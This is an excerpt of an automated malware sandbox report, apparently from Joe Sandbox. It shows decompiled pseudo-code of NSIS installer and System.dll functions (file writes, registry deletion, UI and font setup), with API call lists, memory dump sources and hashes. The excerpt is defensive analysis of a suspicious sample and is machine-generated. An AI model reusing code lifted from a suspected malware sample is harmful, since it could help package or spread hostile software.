                                                                                      0x71032700
                                                                                      0x71032701
                                                                                      0x71032703
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103271c
                                                                                      0x7103271e
                                                                                      0x71032724
                                                                                      0x7103272a
                                                                                      0x7103272a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032692
                                                                                      0x7103272d
                                                                                      0x7103272d
                                                                                      0x71032732
                                                                                      0x71032743
                                                                                      0x71032743
                                                                                      0x71032749
                                                                                      0x7103274e
                                                                                      0x71032753
                                                                                      0x7103275f
                                                                                      0x71032764
                                                                                      0x00000000
                                                                                      0x71032769
                                                                                      0x71032755
                                                                                      0x71032756
                                                                                      0x7103276a
                                                                                      0x7103276a
                                                                                      0x71032753
                                                                                      0x7103276b
                                                                                      0x7103276c
                                                                                      0x7103276f
                                                                                      0x71032783

                                                                                      APIs
                                                                                        • Part of subcall function 710312BB: GlobalAlloc.KERNEL32(00000040,?,710312DB,?,7103137F,00000019,710311CA,-000000A0), ref: 710312C5
                                                                                      • GlobalFree.KERNEL32(?), ref: 71032743
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71032778
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 99fa31c7c7688641df0e257330ce0a53f6b02769069f007b227f0877dfad4bec
                                                                                      • Instruction ID: 0b61ed870113efc574e58948cbe137d27c599a134dd18ab99bb61a8a7792266a
                                                                                      • Opcode Fuzzy Hash: 99fa31c7c7688641df0e257330ce0a53f6b02769069f007b227f0877dfad4bec
                                                                                      • Instruction Fuzzy Hash: 1431B072608102EFC7178F75CD84E2EBBB6FBC9B403A4456DF14287260C73268199B61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 86%
                                                                                      			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                      0x00402950
                                                                                      0x00402952
                                                                                      0x00402957
                                                                                      0x0040295c
                                                                                      0x0040295f
                                                                                      0x00402969
                                                                                      0x0040296d
                                                                                      0x0040296d
                                                                                      0x00402973
                                                                                      0x00402980
                                                                                      0x00402988
                                                                                      0x0040298b
                                                                                      0x00402997
                                                                                      0x0040299a
                                                                                      0x004029a0
                                                                                      0x004029ae
                                                                                      0x004029b3
                                                                                      0x004029b7
                                                                                      0x004029ba
                                                                                      0x004029c3
                                                                                      0x004029cf
                                                                                      0x004029d3
                                                                                      0x004029d6
                                                                                      0x004029e0
                                                                                      0x004029ff
                                                                                      0x004029ec
                                                                                      0x004029f4
                                                                                      0x004029f7
                                                                                      0x004029fc
                                                                                      0x004029fc
                                                                                      0x00402a06
                                                                                      0x00402a06
                                                                                      0x00402a13
                                                                                      0x00402a19
                                                                                      0x00402a1f
                                                                                      0x00402a1f
                                                                                      0x004029b7
                                                                                      0x00402a33
                                                                                      0x00402a35
                                                                                      0x00402a35
                                                                                      0x00402a3f
                                                                                      0x00402a40
                                                                                      0x00402a44
                                                                                      0x00402a48
                                                                                      0x00402a4e
                                                                                      0x00402a4e
                                                                                      0x00402a55
                                                                                      0x004022f1
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: 8d79a1ea2f403288575e4ae95cfc9df1235619e51be8e1d19ef317bb75d43f00
                                                                                      • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                      • Opcode Fuzzy Hash: 8d79a1ea2f403288575e4ae95cfc9df1235619e51be8e1d19ef317bb75d43f00
                                                                                      • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 71032480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E71032480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E7103135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E710312E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M710325F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E710313B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E710313B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x7103506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7103506c, __eax,  *0x7103506c, 0, 0);
									goto L27;
								case 4:
									__eax = E710312CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E710313B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x7103506c =  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2 + 0x18;
									 *__ebx =  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2 + 0x18;
									asm("cdq");
									__eax = E71031510(__edx,  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2 + 0x18, __edx,  *0x71035074 + ( *(__esi + 0x18) - 1) *  *0x7103506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E710312CC(0x71035044);
					goto L10;
				}
			}











                                                                                      0x71032494
                                                                                      0x71032498
                                                                                      0x710324a3
                                                                                      0x710324a3
                                                                                      0x710324aa
                                                                                      0x710324af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710324b3
                                                                                      0x710324b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710324bb
                                                                                      0x710324c6
                                                                                      0x710324d6
                                                                                      0x00000000
                                                                                      0x710324cd
                                                                                      0x710324cf
                                                                                      0x710324e5
                                                                                      0x00000000
                                                                                      0x710324e5
                                                                                      0x710324bd
                                                                                      0x710324bd
                                                                                      0x710324e6
                                                                                      0x710324e6
                                                                                      0x710324e8
                                                                                      0x710324ec
                                                                                      0x710324ec
                                                                                      0x710324ef
                                                                                      0x710324ef
                                                                                      0x710324f7
                                                                                      0x710324ff
                                                                                      0x71032502
                                                                                      0x710325c1
                                                                                      0x710325c2
                                                                                      0x710325cd
                                                                                      0x710325f7
                                                                                      0x710325f7
                                                                                      0x710325dd
                                                                                      0x710325e9
                                                                                      0x710325df
                                                                                      0x710325df
                                                                                      0x710325df
                                                                                      0x00000000
                                                                                      0x71032508
                                                                                      0x71032508
                                                                                      0x00000000
                                                                                      0x7103250f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032517
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032525
                                                                                      0x71032527
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032548
                                                                                      0x7103254e
                                                                                      0x71032551
                                                                                      0x71032553
                                                                                      0x71032563
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032530
                                                                                      0x71032535
                                                                                      0x71032538
                                                                                      0x71032539
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103256f
                                                                                      0x71032575
                                                                                      0x71032576
                                                                                      0x71032579
                                                                                      0x7103257a
                                                                                      0x7103257c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032588
                                                                                      0x7103258b
                                                                                      0x71032597
                                                                                      0x71032599
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710325a5
                                                                                      0x710325b1
                                                                                      0x710325b4
                                                                                      0x710325b6
                                                                                      0x710325b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032508
                                                                                      0x71032502
                                                                                      0x710324db
                                                                                      0x710324e0
                                                                                      0x00000000
                                                                                      0x710324e0

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 710325C2
                                                                                        • Part of subcall function 710312CC: lstrcpynW.KERNEL32(00000000,?,7103137F,00000019,710311CA,-000000A0), ref: 710312DC
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 71032548
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71032563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 77a6cdaf2088a988187e99ed3687d04958aac5eb573d8bf5f81d8f60c987eef7
                                                                                      • Instruction ID: 206eabf3991237e9f1c1e1eb233266712b809df4857cb02b79f98b67698fc77f
                                                                                      • Opcode Fuzzy Hash: 77a6cdaf2088a988187e99ed3687d04958aac5eb573d8bf5f81d8f60c987eef7
                                                                                      • Instruction Fuzzy Hash: F641BFB1108306EFD715DF35D844A2ABBF9FBC8B10F90895DF54786581EB31A648CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 48%
                                                                                      			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                      0x00402eb4
                                                                                      0x00402ebd
                                                                                      0x00402ec6
                                                                                      0x00402ed2
                                                                                      0x00402edb
                                                                                      0x00402ee5
                                                                                      0x00402f0a
                                                                                      0x00402f10
                                                                                      0x00402f15
                                                                                      0x00402f16
                                                                                      0x00402f46
                                                                                      0x00402f1f
                                                                                      0x00402f21
                                                                                      0x00402f71
                                                                                      0x00402f74
                                                                                      0x00000000
                                                                                      0x00402f7a
                                                                                      0x00402f30
                                                                                      0x00402f35
                                                                                      0x00402f37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402f3f
                                                                                      0x00402f44
                                                                                      0x00402f45
                                                                                      0x00402f45
                                                                                      0x00402f52
                                                                                      0x00402f5a
                                                                                      0x00402f61
                                                                                      0x00000000
                                                                                      0x00402f8a
                                                                                      0x00000000
                                                                                      0x00402f69
                                                                                      0x00402ef5
                                                                                      0x00402f08
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402f08
                                                                                      0x00402f90

                                                                                      APIs
                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 1354259210-0
                                                                                      • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                      • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                      • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                      • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 77%
                                                                                      			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                      0x00401d81
                                                                                      0x00401d85
                                                                                      0x00401d9a
                                                                                      0x00401d87
                                                                                      0x00401d89
                                                                                      0x00401d8f
                                                                                      0x00401d8f
                                                                                      0x00401da0
                                                                                      0x00401da3
                                                                                      0x00401dad
                                                                                      0x00401db0
                                                                                      0x00401db8
                                                                                      0x00401dc9
                                                                                      0x00401dcc
                                                                                      0x00401dd7
                                                                                      0x00401dce
                                                                                      0x00401dd0
                                                                                      0x00401dd0
                                                                                      0x00401ddb
                                                                                      0x00401de5
                                                                                      0x00401e0c
                                                                                      0x00401e1b
                                                                                      0x00401e29
                                                                                      0x00401e31
                                                                                      0x00401e39
                                                                                      0x00401e39
                                                                                      0x00401e42
                                                                                      0x00401e48
                                                                                      0x00402ba4
                                                                                      0x00402ba4
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                      • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                      • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                      • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                      • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 73%
                                                                                      			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                      0x00401e4e
                                                                                      0x00401e59
                                                                                      0x00401e5b
                                                                                      0x00401e68
                                                                                      0x00401e7f
                                                                                      0x00401e84
                                                                                      0x00401e91
                                                                                      0x00401e96
                                                                                      0x00401e9a
                                                                                      0x00401ea5
                                                                                      0x00401eac
                                                                                      0x00401ebe
                                                                                      0x00401ec4
                                                                                      0x00401ec9
                                                                                      0x00401ed3
                                                                                      0x00402638
                                                                                      0x0040156d
                                                                                      0x00402ba4
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401E51
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                        • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                        • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000), ref: 00406779
                                                                                      • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
